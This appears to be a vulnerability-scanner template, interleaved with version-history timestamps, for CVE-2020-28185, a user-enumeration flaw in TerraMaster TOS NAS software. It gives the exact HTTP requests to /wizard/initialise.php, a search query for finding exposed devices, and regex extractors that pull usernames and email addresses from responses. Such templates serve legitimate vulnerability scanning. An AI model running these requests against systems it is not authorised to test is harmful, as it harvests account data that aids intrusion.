2023-08-08 09:35:46 +00:00
id : CVE-2020-28185
info :
name : TerraMaster TOS < 4.2.06 - User Enumeration
author : pussycat0x
severity : medium
2023-08-09 07:38:58 +00:00
description : |
User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade TerraMaster TOS to version 4.2.06 or later.
2023-08-08 09:35:46 +00:00
reference :
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-28185
2023-08-09 07:38:58 +00:00
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
2023-08-31 11:46:18 +00:00
- https://www.terra-master.com/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
cve-id : CVE-2020-28185
epss-score : 0.00406
epss-percentile : 0.70469
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
2023-08-08 09:35:46 +00:00
metadata :
2023-08-09 07:49:29 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 2
2023-08-31 11:46:18 +00:00
vendor : terra-master
product : tos
2023-09-06 12:22:36 +00:00
fofa-query : '"TerraMaster" && header="TOS"'
2023-08-11 16:54:13 +00:00
tags : cve,cve2020,terramaster,enum,tos
2023-08-08 09:35:46 +00:00
http :
- raw :
- |
GET /tos/index.php?user/login HTTP/1.1
Host : {{Hostname}}
- |
POST /wizard/initialise.php HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With : XMLHttpRequest
2023-08-09 07:38:58 +00:00
Referer : {{RootURL}}/tos/index.php?user/login
2023-08-08 09:35:46 +00:00
tab=checkuser&username=admin
cookie-reuse : true
2023-08-31 11:46:18 +00:00
2023-08-08 09:35:46 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-08-21 16:13:48 +00:00
- '"username":'
- '"email":'
- '"status":'
2023-08-08 09:35:46 +00:00
condition : and
- type : status
status :
- 200
extractors :
- type : regex
part : body_2
regex :
- '"username":"(.*?)"'
2023-08-09 07:38:58 +00:00
- '"email":"(.*?)"'